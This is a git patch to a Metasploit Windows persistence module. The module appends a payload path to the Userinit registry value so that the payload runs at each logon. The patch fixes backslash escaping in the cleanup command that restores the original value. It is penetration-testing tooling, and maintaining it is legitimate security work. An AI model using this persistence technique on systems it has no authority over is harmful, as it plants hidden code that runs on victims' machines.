From d2c192e9bf1cde491d596e5fbb87a5a26517801c Mon Sep 17 00:00:00 2001
From: root <root@kali>
Date: Sat, 3 Jan 2026 15:37:44 -0500
Subject: [PATCH] windows persistence userinit v6

---
 modules/exploits/windows/persistence/registry_userinit.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/persistence/registry_userinit.rb b/modules/exploits/windows/persistence/registry_userinit.rb
index 30d103c50a..feb3cb2469 100644
--- a/modules/exploits/windows/persistence/registry_userinit.rb
+++ b/modules/exploits/windows/persistence/registry_userinit.rb
@@ -85,7 +85,8 @@ class MetasploitModule < Msf::Exploit::Local
     new_value = (old_value.split(',') + [payload_pathname]).join(',')
     vprint_status("Updating '#{old_value}' to '#{new_value}'")
     registry_setvaldata(regkey, 'Userinit', new_value, 'REG_SZ')
-    @clean_up_rc = "execute -f cmd.exe -a '/c reg.exe add \"#{regkey}\" /v Userinit /t REG_SZ /d \"#{old_value}\" /f -H\n"
+    escaped_old_value = old_value.gsub('\\', '\\\\')
+    @clean_up_rc = %(execute -f cmd.exe -a "/c reg add \\\"#{regkey}\\\" /v Userinit /t REG_SZ /d \\\"#{escaped_old_value}\\\" /f" -H\n)
     @clean_up_rc<<"rm #{payload_pathname.gsub('\\','/')}\n"
   end
 end